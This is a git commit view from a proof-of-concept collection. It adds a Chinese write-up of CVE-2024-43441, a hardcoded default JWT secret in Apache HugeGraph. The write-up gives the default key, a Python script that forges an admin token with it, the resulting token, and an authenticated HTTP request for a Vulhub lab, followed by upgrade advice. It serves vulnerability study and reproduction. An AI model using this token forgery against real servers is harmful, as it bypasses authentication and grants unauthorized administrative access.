mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-05 10:50:23 +00:00
update CVE-2024-43441
This commit is contained in:
Threekiii
parent
0f6b3700ad
commit
ae49bd83fb
@ -875,6 +875,7 @@
|
|||||||
* Apache Druid 远程代码执行漏洞 CVE-2021-25646
|
* Apache Druid 远程代码执行漏洞 CVE-2021-25646
|
||||||
* Apache Druid 远程代码执行漏洞 CVE-2021-26919
|
* Apache Druid 远程代码执行漏洞 CVE-2021-26919
|
||||||
* Apache Druid 远程代码执行漏洞 QVD-2023-9629
|
* Apache Druid 远程代码执行漏洞 QVD-2023-9629
|
||||||
|
* Apache HugeGraph JWT Token 密钥硬编码漏洞 CVE-2024-43441
|
||||||
* Apache HugeGraph 远程代码执行漏洞 CVE-2024-27348
|
* Apache HugeGraph 远程代码执行漏洞 CVE-2024-27348
|
||||||
* ClickHouse API 数据库接口未授权访问漏洞
|
* ClickHouse API 数据库接口未授权访问漏洞
|
||||||
* ElasticSearch Groovy 沙盒绕过 & 代码执行漏洞 CVE-2015-1427
|
* ElasticSearch Groovy 沙盒绕过 & 代码执行漏洞 CVE-2015-1427
|
||||||
|
|||||||
89
数据库漏洞/Apache HugeGraph JWT Token 密钥硬编码漏洞 CVE-2024-43441.md
Normal file
89
数据库漏洞/Apache HugeGraph JWT Token 密钥硬编码漏洞 CVE-2024-43441.md
Normal file
@ -0,0 +1,89 @@
|
|||||||
|
# Apache HugeGraph JWT Token 密钥硬编码漏洞 CVE-2024-43441
|
||||||
|
|
||||||
|
## 漏洞描述
|
||||||
|
|
||||||
|
Apache HugeGraph 是一款快速、高度可扩展的图数据库。它提供了完整的图数据库功能,具有出色的性能和企业级的可靠性。
|
||||||
|
|
||||||
|
Apache HugeGraph 存在一个 JWT token 密钥硬编码漏洞。当启用了认证但未配置 auth.token_secret 时,HugeGraph 将使用一个硬编码的默认 JWT 密钥,其值为 FXQXbJtbCLxODc6tGci732pkH1cyf8Qg。攻击者可以使用这个默认密钥生成有效的 JWT token,从而绕过认证执行未经授权的操作。
|
||||||
|
|
||||||
|
参考链接:
|
||||||
|
|
||||||
|
- https://github.com/advisories/GHSA-f697-gm3h-xrf9
|
||||||
|
- https://github.com/apache/incubator-hugegraph/commit/03b40a52446218c83e98cb43020e0593a744a246
|
||||||
|
|
||||||
|
## 漏洞影响
|
||||||
|
|
||||||
|
```
|
||||||
|
1.0.0 <= HugeGraph < 1.5.0
|
||||||
|
```
|
||||||
|
|
||||||
|
## 环境搭建
|
||||||
|
|
||||||
|
Vulhub 执行如下命令启动 Apache HugeGraph 1.3.0 服务器:
|
||||||
|
|
||||||
|
```
|
||||||
|
docker compose up -d
|
||||||
|
```
|
||||||
|
|
||||||
|
服务启动后,可以通过 `http://your-ip:8080` 访问 HugeGraph 的 RESTful API。
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
默认情况下,Apache HugeGraph 支持两种认证模式:HTTP 基础认证和 JWT 认证。当启动 docker 容器时,系统会使用环境变量 PASSWORD 中指定的值作为默认管理员的密码。在正常情况下,您可以使用用户名 "admin" 和该密码通过 HTTP 基础认证访问 API。
|
||||||
|
|
||||||
|
如果您尝试在不提供任何认证头的情况下访问 API,将会收到如下错误:
|
||||||
|
|
||||||
|
```json
|
||||||
|
{
|
||||||
|
"exception": "class jakarta.ws.rs.NotAuthorizedException",
|
||||||
|
"message": "Authentication credentials are required",
|
||||||
|
"cause": ""
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## 漏洞复现
|
||||||
|
|
||||||
|
除了默认管理员密码外,我们还可以使用默认 JWT 密钥生成有效的 JWT token 绕过认证。
|
||||||
|
|
||||||
|
生成一个使用默认密钥的 JWT token:
|
||||||
|
|
||||||
|
```python
|
||||||
|
# 安装 jwt 库,运行 `pip install pyjwt`
|
||||||
|
import jwt
|
||||||
|
|
||||||
|
# 使用默认密钥生成 JWT token
|
||||||
|
token = jwt.encode(
|
||||||
|
{
|
||||||
|
"user_name": "admin",
|
||||||
|
"user_id": "-30:admin",
|
||||||
|
"exp": 9739523483
|
||||||
|
},
|
||||||
|
"FXQXbJtbCLxODc6tGci732pkH1cyf8Qg",
|
||||||
|
algorithm="HS256"
|
||||||
|
)
|
||||||
|
print(f"Generated JWT token: {token}")
|
||||||
|
# Output:
|
||||||
|
# Generated JWT token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX25hbWUiOiJhZG1pbiIsInVzZXJfaWQiOiItMzA6YWRtaW4iLCJleHAiOjk3Mzk1MjM0ODN9.eZxB0qIsVEtRuOMwXbOhENwS-OoY0miStHOQlBdJXt8
|
||||||
|
```
|
||||||
|
|
||||||
|
使用生成的 JWT token 访问受保护的端点:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: your-ip:8080
|
||||||
|
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX25hbWUiOiJhZG1pbiIsInVzZXJfaWQiOiItMzA6YWRtaW4iLCJleHAiOjk3Mzk1MjM0ODN9.eZxB0qIsVEtRuOMwXbOhENwS-OoY0miStHOQlBdJXt8
|
||||||
|
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
|
||||||
|
Accept: */*
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
也可以通过 [jwt.io](https://jwt.io/) 等工具生成 JWT token:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## 漏洞修复
|
||||||
|
|
||||||
|
升级 Apache HugeGraph-Server 至 1.5.0 及以上版本。
|
||||||
Binary file not shown.
|
After Width: | Height: | Size: 88 KiB |
Binary file not shown.
|
After Width: | Height: | Size: 148 KiB |
Binary file not shown.
|
After Width: | Height: | Size: 282 KiB |
Binary file not shown.
|
After Width: | Height: | Size: 279 KiB |
Loading…
x
Reference in New Issue
Block a user